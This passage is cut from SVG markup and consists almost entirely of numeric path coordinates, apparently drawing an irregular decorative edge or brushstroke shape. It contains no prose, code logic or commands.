2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4